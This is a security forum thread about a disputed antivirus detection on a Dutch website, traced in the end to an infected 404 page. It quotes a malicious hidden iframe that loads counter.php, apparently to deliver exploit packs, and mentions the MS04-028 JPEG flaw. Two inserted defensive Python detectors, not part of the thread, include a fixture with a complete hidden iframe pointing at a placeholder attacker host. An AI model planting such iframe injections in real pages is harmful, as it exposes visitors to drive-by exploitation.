
False Positive: HEUR:Trojan.Script.Generic

  • 8 December 2020
  • 22 replies
  • 770 views

Userlevel 1

hi,

Can this be checked? is it a false positive?

http://www.apport-vaals.nl/images/footer.jpg (Trojan.Script.Generic)
http://www.apport-vaals.nl/favicon.ico  (Trojan.Script.Generic)


22 replies

Userlevel 7
Badge +8

Welcome to Kaspersky Community.

 

Seems a FP:

 

https://www.virustotal.com/gui/url/053a73704ae38feec6c9d7ce1af17ddaa73b39f10c2e75ec7c15fea87c5482a1/detection

 

https://opentip.kaspersky.com/www.apport-vaals.nl/

 

I’ve sent the URL to K. analysts...

Userlevel 1

Thanks, I'm curious what it will reveal.

If it's a FP it should be removed from the KIS database.

 

Userlevel 7
Badge +8

Final verdict:


Userlevel 1

I'm not seeing that code; it's not inside the index file. And KIS is not complaining about it.

As my screenshot shows, it's complaining about favicon.ico and footer.jpg.

Userlevel 7
Badge +8

I sent Your words and this is the response:


Userlevel 1

I'm not the owner of that website. For a visitor there are two ways to check for

<iframe src="h t="10”/> "”

examine the HTML files in "Temporary Internet Files”

or

on page right click and choose "View page source” and search for that code.

I didn't find it!

 

And for the second time: KIS isn't reporting/complaining about <iframe src="h t="10”/> "”

It's reporting/complaining and blocking about (see screenshot) favicon.ico and footer.jpg

both holding (Trojan.Script.Generic)

Userlevel 7
Badge +4

Hello,

The infected JPEG file has been removed from that site. This uses a very old GDI+ vulnerability (MS04-028). Current systems are immune to this vulnerability.

Vulnerability information: browsing the picture, it is possible to overflow, download a virus file in an iframe from the JPEG file specified by the Trojan grower, and execute it.

Now you can access this website without any problem. The related infected JPEG file has been removed by the website, with a 404 response.

Could someone get the footer.jpg or favicon.ico from that website? Please pm me to send them to me, thanks.

Regards.
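The post above describes the MS04-028 GDI+ JPEG bug and HTML hidden inside image files. As an added example (not code from the thread or from Kaspersky), this defensive checker walks a JPEG's marker segments and flags the two things a responder would look for: a COM segment whose length field is below 2 (the malformed value behind MS04-028) and any bytes appended after the EOI marker. All sample files are constructed inline.

```python
import struct

def inspect_jpeg(data: bytes) -> dict:
    """Walk JPEG marker segments; report malformed COM lengths and data after EOI."""
    findings, trailing = [], b""
    if data[:2] != b"\xff\xd8":
        return {"jpeg": False, "findings": ["missing SOI marker"], "trailing": trailing}
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            findings.append(f"unexpected byte 0x{data[pos]:02x} at offset {pos}")
            break
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI: anything after it is not image data
            trailing = data[pos + 2:]
            break
        if marker == 0xDA:                      # SOS: entropy-coded data runs to EOI
            eoi = data.find(b"\xff\xd9", pos + 2)
            if eoi == -1:
                findings.append("SOS segment without EOI marker")
                break
            trailing = data[eoi + 2:]
            break
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:                          # length counts its own 2 bytes; < 2 is invalid
            kind = "COM" if marker == 0xFE else f"0x{marker:02x}"
            note = " (MS04-028 pattern)" if marker == 0xFE else ""
            findings.append(f"{kind} segment with length {length} at offset {pos}{note}")
            break
        pos += 2 + length
    if trailing:
        findings.append(f"{len(trailing)} bytes appended after EOI")
    return {"jpeg": True, "findings": findings, "trailing": trailing}

# Constructed samples (not the files discussed in the thread).
_APP0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
_SOS = b"\xff\xda\x00\x08\x01\x01\x00\x00\x3f\x00" + b"\x12\x34"
CLEAN_JPEG = b"\xff\xd8" + _APP0 + _SOS + b"\xff\xd9"
APPENDED_JPEG = CLEAN_JPEG + b'<iframe src="http://example.invalid/x"></iframe>'
BAD_COM_JPEG = b"\xff\xd8\xff\xfe\x00\x01\x00" + b"\xff\xd9"

if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_JPEG), ("appended", APPENDED_JPEG), ("bad_com", BAD_COM_JPEG)]:
        print(name, inspect_jpeg(blob)["findings"])
```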

Userlevel 7
Badge +4

I'm not the owner of that website. For a visitor there are two ways to check for

<iframe src="h t="10”/> "”

examine the HTML files in "Temporary Internet Files”

or

on page right click and choose "View page source” and search for that code.

I didn't find it!

 

And for the second time: KIS isn't reporting/complaining about <iframe src="h t="10”/> "”

It's reporting/complaining and blocking about (see screenshot) favicon.ico and footer.jpg

both holding (Trojan.Script.Generic)


Hello,

Those codes are at the bottom of the content of the footer.jpg and favicon.ico files, not in the HTML webpage code.

Regards.

Userlevel 7
Badge +9

Hello @Wesly.Zhang

Here’s the data:


https://youtu.be/cb0roWqRGOk

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

Hello @Wesly.Zhang

Here’s the data:


https://youtu.be/cb0roWqRGOk

Thank you:pray_tone3:

Flood:whale: +:whale2:


Hello,

I know this situation. I don't know who removed the infected JPEG file: the website administrator, a bad guy or a security solution. If it is a bad guy who temporarily takes a malicious object offline, waits for the security product to remove the alarm banning the URL, and then re-launches the malicious object, the security product will ban the related URL again. This is also a problem.

What we can now ask KL is: if the malicious object no longer exists, can the behaviour of banning the URL be resolved?

I will ask our KL Chinese virus analyst. If there is any news, I will reply here.

Regards.

Userlevel 7
Badge +4

@harlan4096@René@Flood and Flood's wife

Are footer.jpg and favicon.ico available for downloading on your side?

Regards.

Userlevel 7
Badge +9

Hello @Wesly.Zhang

Issue persists:


Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

Hello,

No detection is observed after deleting the picture. Thank you for your help.

New information from KL. It means this issue will be resolved. Waiting for a new database update.

Regards.

Userlevel 7
Badge +9

Hello @Wesly.Zhang

Thank you for the update:ok_hand_tone3:

So, Kaspersky Lab are now acknowledging that the Heur:Trojan.Script.Generic detections for http://www.apport-vaals.nl/images/footer.jpg & http://www.apport-vaals.nl/favicon.ico are false positives, is that correct?

Please let us know?

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

Hello @Wesly.Zhang

Thank you for the update:ok_hand_tone3:

So, Kaspersky Lab are now acknowledging that the Heur:Trojan.Script.Generic detections for http://www.apport-vaals.nl/images/footer.jpg & http://www.apport-vaals.nl/favicon.ico are false positives, is that correct?

Please let us know?

Thank you:pray_tone3:

Flood:whale: +:whale2:


Hello,

I think the answer is NO if footer.jpg and favicon.ico exist on the website server now. There is reason to believe that these two files may have malicious code. But the above two infected files have gone. The detection should be correct in time. The answer is so simple and straightforward.

Regards.

Userlevel 1

As far as I know this is a 100% false positive (both files don't exist and are not served anymore).

So Kaspersky should remove it from the database. A bit weird they add something to a database and NEVER check if it's still valid!

How reliable are they?

Simply NOT!

Userlevel 7
Badge +9

As far as I know this is a 100% false positive (both files don't exist and are not served anymore).

So Kaspersky should remove it from the database. A bit weird they add something to a database and NEVER check if it's still valid! How reliable are they? Simply NOT!

@René

We raised a case with the Kaspersky Virus experts: 

This is the history: 

  • Dec 9th 2020, case logged, with the URLs you provided & the Kaspersky detections from our tests.
  • 11th Dec 2020 Kaspersky response:

No malicious software was found on the website "http://www.apport-vaals.nl". The malicious code was probably removed from the server.

  • 11th Dec, 2020, our response:

Why are the alerts still happening?  Provided supporting data. 

  • Dec 14th 2020, Kaspersky response: our Virus Analysts have just replied:

Please note that the warning you received is not a false-alarm. The site is infected. Here is the malicious code:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
If you are a webmaster, please remove the above code from the page. Also, we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

  • 14th Dec 2020, our response:

(1) Specifically, what does the malicious code do? 

(2) Does:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/

"steal passwords" ? 

(3) How exactly is that code malicious? 

  • 15th Dec, 2020, Kaspersky response:

You can find the article on iframe here: https://securelist.com/visit-from-an-old-friend-counter-php/57478/.

The domain used in iframes on the mentioned resource is most likely used to deliver exploit packs to clients.

**********

:no_entry: Also, we wrote to apport-vaals.nl site administrators, they never responded:no_entry:

**********

Recommendations:

  • You log a case with Kaspersky Technical Support
  • Please share the advice you receive, from Kaspersky Technical/Virus experts, with the Community, when it’s available ?
  • Provide us with written advice, from apport-vaals.nl site administrators, that the code has been removed, we’ll continue with the issue & Kaspersky experts.

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +4

As far as I know this is a 100% false positive (both files don't exist and are not served anymore).

So Kaspersky should remove it from the database. A bit weird they add something to a database and NEVER check if it's still valid! How reliable are they? Simply NOT!

@René

We raised a case with the Kaspersky Virus experts: 

This is the history: 

  • Dec 9th 2020, case logged, with the URLs you provided & the Kaspersky detections from our tests.
  • 11th Dec 2020 Kaspersky response:

No malicious software was found on the website "http://www.apport-vaals.nl". The malicious code was probably removed from the server.

  • 11th Dec, 2020, our response:

Why are the alerts still happening?  Provided supporting data. 

  • Dec 14th 2020, Kaspersky response: our Virus Analysts have just replied:

Please note that the warning you received is not a false-alarm. The site is infected. Here is the malicious code:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/
If you are a webmaster, please remove the above code from the page. Also, we strongly recommend that you change passwords to all services that can be used to modify website contents because they may have been stolen.

  • 14th Dec 2020, our response:

(1) Specifically, what does the malicious code do? 

(2) Does:
iframe src="http://
...
counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/

"steal passwords" ? 

(3) How exactly is that code malicious? 

  • 15th Dec, 2020, Kaspersky response:

You can find the article on iframe here: https://securelist.com/visit-from-an-old-friend-counter-php/57478/.

The domain used in iframes on the mentioned resource is most likely used to deliver exploit packs to clients.

**********

:no_entry: Also, we wrote to apport-vaals.nl site administrators, they never responded:no_entry:

**********

Recommendations:

  • You log a case with Kaspersky Technical Support
  • Please share the advice you receive, from Kaspersky Technical/Virus experts, with the Community, when it’s available ?
  • Provide us with written advice, from apport-vaals.nl site administrators, that the code has been removed, we’ll continue with the issue & Kaspersky experts.

Thank you:pray_tone3:

Flood:whale: +:whale2:


Hello,

counter.php…… Where is the PHP file? In a JPEG file? This site doesn't use the PHP language, just a simple static HTML page. Interesting…... drink too much vodka? Dizzy? I suspect that what they (KL) see is different from what we see. Maybe yes, maybe not…... Only God knows.

Regards.

 

Userlevel 7
Badge +9

Hello,

I suspect that what they (KL) see is different from what we see.

 

Agreed Wesly, 

BUT, there is only so much bashing our heads against a brick wall, that we’re prepared to tolerate. 

The OP has the option to argue it out with Kaspersky Technical Support/Virus Lab Analysts, if they wish to. 

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +5

Hi @Flood and Flood's wife, can you share the INC number with me? I will double-check.

Regards,

Igor

Userlevel 7
Badge +9

Hi @Flood and Flood's wife, can you share the INC number with me? I will double-check.

Regards,

Igor

Hello @Igor Kurzin,

Thank you for participating:pray_tone3:

Pm’d.

Note, we asked TS to close the case, as KVA were adamant the detections are legitimate & we’d had no response from the site admin.

Thank you:pray_tone3:

Flood:whale: +:whale2:

Userlevel 7
Badge +5

Hi all, 

The server has its 404 page infected; it does not matter what is in the URL address, the malicious iframe is inserted with the 404 response.

 

Regards,

Igor
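Igor's explanation above is the reason the image URLs kept triggering: the 404 body, not the requested file, carried the hidden iframe. As an added example (not code from the thread or from Kaspersky), this checker inspects any response body, error pages included, for iframes that are invisible or at most 10x10 px and reports the host they point at. The 404 bodies are constructed inline and the host is a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

def _px(value) -> int:
    """Parse a width/height attribute; missing or unparsable values count as large."""
    try:
        return int(str(value).lower().rstrip("px"))
    except ValueError:
        return 10**9

class HiddenIframeFinder(HTMLParser):
    """Collect the host of every iframe that is hidden by style or at most 10x10 px."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = "visibility:hidden" in style or "display:none" in style
        tiny = _px(a.get("width")) <= 10 and _px(a.get("height")) <= 10
        if hidden or tiny:
            self.hits.append(urlparse(a.get("src") or "").netloc or "(no src)")

def check_response(url: str, status: int, body: str) -> dict:
    """Inspect a response body of any status code for hidden iframes."""
    finder = HiddenIframeFinder()
    finder.feed(body)
    finder.close()
    return {"url": url, "status": status, "hidden_iframes": finder.hits,
            "suspicious": bool(finder.hits)}

# Constructed 404 bodies (not captured from the site); attacker.invalid is a placeholder.
INFECTED_404 = ('<html><body><h1>404 Not Found</h1>'
                '<iframe src="http://attacker.invalid/counter.php" '
                'style="visibility: hidden; position: absolute; left: 0px; top: 0px" '
                'width="10" height="10"></iframe></body></html>')
CLEAN_404 = ('<html><body><h1>404 Not Found</h1>'
             '<iframe src="https://example.com/help" width="600" height="400"></iframe>'
             '</body></html>')

if __name__ == "__main__":
    for body in (INFECTED_404, CLEAN_404):
        print(check_response("http://example.invalid/images/footer.jpg", 404, body))
```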
